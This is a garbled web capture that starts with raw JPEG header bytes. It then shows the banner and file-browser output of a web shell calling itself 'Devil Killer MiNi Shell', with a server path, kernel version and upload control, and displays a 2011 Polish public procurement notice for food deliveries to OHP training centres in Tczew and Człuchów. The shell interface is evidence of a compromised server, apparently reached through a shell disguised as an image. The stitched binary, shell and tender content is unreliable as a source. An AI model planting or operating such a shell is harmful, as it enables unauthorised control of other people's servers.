JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111124/307243-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie 
i OSiW w Człuchowie 2012 r.</b><br>
<b>Numer ogłoszenia: 307243 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskaohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie 
i OSiW w Człuchowie 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla 
- Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 - zadanie nr 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11. 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4- zadanie nr 12, 13
od 1 stycznia 2012 r. do dnia 31 grudnia 2012 roku 
      Przedmiot zamówienia podzielono na trzynaście zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - ryby i przetwory konserwowe 
Zadanie nr 7 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 8 - produkty skrobi - mąka  
Zadanie nr 9 - różne produkty spożywcze 
Zadanie nr 10- oleje i tłuszcze roślinne 
Zadanie nr 11 - napoje   
Zadanie nr 12 - mrożonki 
 Zadanie nr 13 - ryby i przetwory konserwowe 

2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do:
- Ośrodka Szkolenia i Wychowania w Tczewie , ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE OD 1 DO 11. 
- Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy) ZADANIE 12, 13. 
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14)	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
15)	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
16)	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 15.22.00.00-6, 15.86.00.00-0, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca, wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 50 000 zł (pięćdziesiąt tysięcy złotych). Należy dołączyć do oferty opłaconą polisę odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19) Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskaohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	100
banany	kg	150
brzoskwinie	kg	80
cytryny	kg	30
gruszki	kg	60
jabłka	kg	300
kiwi	kg	11
kiwi	szt	92
nektaryny	kg	50
maliny 500g	szt	8
maliny	kg	8
mandarynki	kg	80
pomarancza	kg	60
śliwki	kg	20
truskawki	kg	30
winogrona	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	48
brzoskwinie kons.0.9	szt	30
Dżem 7 kg	szt	10
Dżem  270g	szt	100
kompot wiśniowy 0,9 l	szt	50
sok owocowy 2l (różne smaki-pomarańcz	szt	30
grejfrut, jabłkowy, cz.pożeczka, mixitp)		
sok owocowy 1l (różne smaki-pomarań,	szt	45
gruszka, wiśnia, grejfrut,mix itp.)		
sok typu owocowy, warzywno -owocowe	szt	185
(marchew-trusk-banan, marchew-malina-		
banan, marchew-jabł-banan itp.) 220ml		
syrop owocowy 6,5l	szt	40
syrop owocowy 1l	szt	20
rodzynki suszone 100g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody - botwina	szt	50
burak	kg	250
brokuł	szt	35
cebula	kg	350
cebula czerwona 	kg	5
czosnek	szt	25
fasola drobna 5kg	szt	5
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	40
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta 	kg	200
kapusta pekińska	kg	80
kapusta pekińska	szt	40
kalafior	szt	65
koper	szt	100
koper duży	szt	15
marchew młoda	kg	50
marchew myta	kg	400
ogórek świeży	kg	250
papryka świeża	kg	80
pietruszka korzeń	kg	20
pomidor	kg	200
por 	szt	40
por 	kg	100
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	70
zielenina natka	szt	250
ziemniaki młode	kg	400
ziemniaki 	kg	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	15
fasolka czerwona konserw.	szt	10
groszek konserwowy 450g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona  	kg	180
koncentrat pomidorowy 0,9l - 1l	szt	55
kukurydza konserwowa	szt	40
ogórki kiszone 	kg	100
ogórki małosolne	kg	15
ogórki konserwowe 0,9l	szt	90
papryka konserwowa 0,9l	szt	85
pieczarka	kg	80
pieczarka konserwowa 0,9l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	20
brokuły mroż. 2,5 kg	szt	8
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	70
matijas	kg	20
makrela wędzona	kg	25
panga	kg	70
paprykarz 156g	szt	60
szprot w pomidorach	szt	50
śledź w pomidorach	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony pszenny 0,6 kg	szt	4500
chleb ziarnisty 400g	szt	200
drożdżówki	szt	135
ciasta różne	kg	9
bułki pszenne100g	szt	420
bułki 50g	szt	460
bułki hamburger	szt	140
rogal 100g	szt	140
bułka tarta	kg	60
pączki 100g	szt	135.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	30
kasza jęczm. Średnia	kg	40
mąka pszenna typu 500	kg	100
mąka pszenna typu 450	kg	70
mąka ziemiaczna	kg	25
płatki kukurydz. 250G	szt	30
platki kukur. 500 g	szt	50
platki kuku.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki typu  chocapic	szt	20
ryż w woreczkach 0,5kg	szt	50
ryż 1kg	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	45
baton czekoladowy nadziewany	szt	135
baton czekoladowy w opakowaniu	szt	90
barszcz czerwony- koncentrat 300ml 	szt	35
bialy barszcz	szt	50
budyń 40g	szt	200
chrupki kukurydziane	szt	46
ciastka w polewie	kg	14
ciastka kruche	kg	14
ciastka typy pierniki	kg	14
ciastka typu wafelki	kg	14
cukier	kg	450
cukier puder  0,5 kg	szt	20
cukier waniliowy	szt	60
cukierki czekoladowe	kg	14
cukierki typu krówki	kg	9
cukierki owocowe	kg	6
cynamon 0,20g	szt	24
czekolada z orzechami	szt	45
czekolada nadziewana	szt	135
czekolada pełnomleczna	szt	180
czipsy 9g	szt	135
drożdże 100g	szt	40
galaretka owocowa	szt	150
herbata expres 100 szt	szt	100
herbata expr. Mietowa 20szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata owoc.rozpusz gran.	szt	15
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	80
kawa rozpuszczalna zboż typu inka	szt	25
kawa rozpuszczalna naturalna	szt	5
kawa naturalna mielona 500g	szt	6
kakao rozpuszczalne 300g	szt	80
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
Keczup 1 l	szt	5
kisiel 38g	szt	200
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
krem czekoladowo orzechowy 400g	szt	35
krem czekoladowo orzechowy 200g	szt	40
kwasek cytrynowy 20g	szt	100
liść laurowy 12g	szt	40
lizak kulka	szt	45
lizak  serduszko	szt	270
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	37
makaron nitki  0.5 kg	szt	36
makaron gniazda 1kg	szt	20
makaron rurki 1 kg	szt	30
makaron świderki 1kg	szt	50
makaron spagetti 0,5kg	szt	70
majeranek 20g	szt	40
majeranek 150g	szt	8
majonez  400g 	szt	50
majonez   700g  	szt	20
majonez 900g do sałatek	szt	16
mikołaj czekoladowy	szt	46
miód sztuczny 200g	szt	46
miód sztuczny  5kg	szt	2
Miód naturalny 0,9 l	szt	8
musztarda  Sarepska 180g	szt	36
musztrda tuba 0.5 l	szt	14
Ocet 10%	szt	20
paluszki solone 0,400g	szt	24
paluszki z sezamem 70g	szt	135
papryka mielona 20g	szt	60
paprykarz szczeciń 131g	szt	90
paprykarz szczcz. 300G	szt	45
pasztet puszka 160g	szt	96
pasztet 135g z pomidorami	szt	96
pieprz mielony 20g	szt	300
pieprz ziolowy 20g	szt	30
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa gyros 30	szt	40
przyprawa do grilla 20g	szt	15
przyprawa do mięsa 20g  	szt	30
przyprawa do kurczaka 1 kg	szt	2
